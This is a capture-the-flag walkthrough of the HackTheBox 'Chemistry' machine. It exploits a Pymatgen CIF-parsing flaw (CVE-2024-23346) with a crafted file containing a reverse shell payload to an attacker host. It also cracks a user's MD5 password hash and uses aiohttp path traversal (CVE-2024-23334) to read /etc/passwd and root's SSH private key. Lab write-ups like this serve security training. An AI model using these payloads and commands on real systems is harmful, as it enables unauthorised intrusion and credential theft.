Chemistry Walkthrough — HackTheBox

An Easy Linux Machine

Image by Author

Introduction

In this write-up, we’ll explore an easy Linux machine on which we gain an initial foothold by exploiting a CVE, then enumerate the machine and exploit another CVE to achieve root access.

Note:

This box was very slow and unstable. So Be patient and try repeatedly to get most of the things done in this machine. Try ‘pinging’. Maybe my vpn is slow, but anyways I’m sharing this, since I experienced a bad connection.

Reconnaissance

1. After Starting the machine, I set my target IP as $target environment variable and ran the Nmap command.

Command — Port Scan: Nmap

sudo nmap $target -sC --top-ports=1000 -sV -v -Pn -O > nmap.out

2. Then, As usual, I added the host: chemistry.htb in /etc/hosts.

3. On port 5000, There is a website hosted. It was a CIF file analyzer.

What is CIF file?

A CIF file is a Crystallographic Information File. It is used for chemistry-related studies. A CIF or Crystallographic Information File is the standard format for storing crystallographic structural data. It is for the Crystallographic Information Framework, a broader system of exchange protocols.

4. After registration, There was a CIF file uploading dashboard with an example file hosted there.

5. I downloaded that example file and uploaded it to see how it gets processed.

6. Clicking on the ‘View’ button will show the crystallographic information.

7. Upon viewing the CIF file by ‘cat’, It will show the below data.

8. Let’s do a basic Google search about cif file vulnerability.

9. The first link seems to be interesting. I saw the below while visiting it.

Initial Foothold

1. Learn about the exploit in this link

Critical Security Flaw in Pymatgen Library (CVE-2024–23346) — vsociety

CVE-2024–23346 Description

CVE-2024–23346 is a critical vulnerability in the Pymatgen library, specifically affecting versions prior to 2024.2.20. The flaw allows for arbitrary code execution due to the unsafe use of the eval() function in the parse_transformation_string() method. Also there is no explicit sanitization of the transformation string, allowing potentially dangerous characters.

2. Upon reviewing the PoC that is given in the article and also in the GitHub above, We can see that the below line in the CIF file is used to run Python shell commands directly by importing the ‘OS’ module.

if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'

3. To test this vulnerability, I tried to run the ‘whoami’ command with the below code.

if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("whoami");0,0,0'

4. But it didn’t work, and then I figured out that we can’t see the output since it’s not sending the output anywhere.

5. However, this still executes the code inside the machine, so I tried a Reverse shell payload.

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/<attacker-ip>/4444 0>&1\'");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

6. Let’s upload this file on the dashboard and start a listener on our side.

7. Upon clicking the ‘View’ button on the dashboard, we get the shell.

8. Now, as an ‘app’ user, We don’t have much permission.

Lateral Movement

i. User Flag

1. While checking folders in the ‘/home’ directory, I found another user directory ‘rosa’.
2. After checking what files are available in the ‘app’ directory. I found a database file.

Command — Database file dump: sqlite3

sqlite3 /home/app/instance/database.db .dump

2. There is an ‘MD5’ hash of the user ‘rosa’. Let’s try to decrypt using John.

Command — Decrypt MD5 hash: john

john user.hash --wordlist=/mnt/HDD1/VM\ files/kali/wordlists/rockyou.txt --format=raw-md5

3. I found the password for ‘rosa’ and SSHed into the server as ‘rosa’.

ii. Root Flag

1. Now, We have low-privileged user access. I am unable to run sudo -l as the ‘Rosa’ user.
2. Let’s check what Network connections are running using ‘netstat’.

Command — Listing listening network connections: netstat

netstat -tnl

3. There is another service running on port ‘8888’ on localhost. Let’s forward this using the SSH tunnel.

Command — Forwarding service using SSH tunnel: ssh

ssh -L 4000:localhost:8080 rosa@chemistry.htb

4. Run this command in your local machine (attacker-system). Here, We forward the service running on the ‘8080’ port on chemistry.htb to our machine on port ‘4000’.

5. Upon visiting localhost:4000, we found the below dashboard.

Command — Find Website underlying technology and server detail: whatweb

whatweb localhost:4000

6. Let’s search for vulnerability on ‘aiohttp/3.9.1’.

7. It seems like we can exploit this machine using CVE-2024–23334.

CVE-2024–23334 Description

CVE-2024–23334 is a directory traversal vulnerability in the Python aiohttp framework, exploitable when the follow_symlinks setting is enabled for static routes. Attackers can potentially access restricted files by constructing malicious URLs.

8. Upon reviewing the exploit on GitHub, the path traversal vulnerability can be exploited on static routes. To find a static route on our site, let’s check for directories.

Command — Directory Busting: gobuster

gobuster dir -u http://localhost:4000/ -w /mnt/HDD1/VM\ files/kali/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

9. Reading the exploit, we found that any of the below paths can exploit the path traversal vulnerability.

/assets/../etc/passwd
/assets/../../etc/passwd
/assets/../../../etc/passwd
/assets/../../../../etc/passwd 

and go on

Command — Path Traversal exploit using curl: curl

curl -s --path-as-is "http://localhost:4000/assets/../../../etc/passwd"

10. Let’s get the id_rsa file from the ‘root’ directory.

Command — Getting id_rsa file using curl: curl

curl -s --path-as-is "http://localhost:4000/assets/../../../../root/.ssh/id_rsa"

11. Now, I have a root SSH private key which can be used to get root access.

Command — SSH as Root: ssh

ssh -i id_rsa root@chemistry.htb

Now, We are ROOT! Thanks for Reading. Happy hacking!!